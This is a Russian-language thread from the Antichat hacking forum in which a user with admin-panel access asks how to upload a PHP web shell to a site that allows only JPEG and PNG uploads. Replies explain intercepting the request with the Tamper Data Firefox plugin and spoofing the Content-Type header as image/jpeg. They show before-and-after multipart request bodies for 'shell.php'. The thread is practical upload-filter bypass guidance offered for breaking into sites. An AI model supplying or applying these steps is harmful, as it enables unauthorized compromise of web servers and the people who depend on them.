Форум АНТИЧАТ - MIME Types и php-шелл

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - MIME Types и php-шелл (https://forum.antichat.xyz/showthread.php?t=229579)

Есть доступ к админке. Есть возможность указать разрешенные mime-type(сейчас разрешены только jpeg, png, jpg). Как залить php шелл?

Мне кажется или ты уже сам ответил на свой вопрос?

Укажи в заголовке Content-Type: image/jpeg или любое из разрешенных расширений.

Цитата:

Сообщение от Redwood

Redwood said:
Мне кажется или ты уже сам ответил на свой вопрос?
Укажи в заголовке Content-Type: image/jpeg или любое из разрешенных расширений.

Вот именно это я и не понимаю как сделать?

И можно как-нить добавить вид php-скрипта в разрешенные mime? Какой у него?

Например плагином Tamper Data для Mozilla Firefox.

Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.

В ответ придет, что то вроде:

Код:

Code:

-----------------------------41184676334\r\n

Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n

-----------------------------41184676334\r\n

Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n

Content-Type: application/octet-stream\r\n\r\n\r\n

-----------------------------41184676334\r\n

Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n

-----------------------------41184676334--\r\n

Меняешь на:

Код:

Code:

------------------------------41184676334\r\n

Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n

-----------------------------41184676334\r\n

Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n

Content-Type: image/jpeg\r\n\r\n\r\n

-----------------------------41184676334\r\n

Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n

-----------------------------41184676334--\r\n

И отправляешь.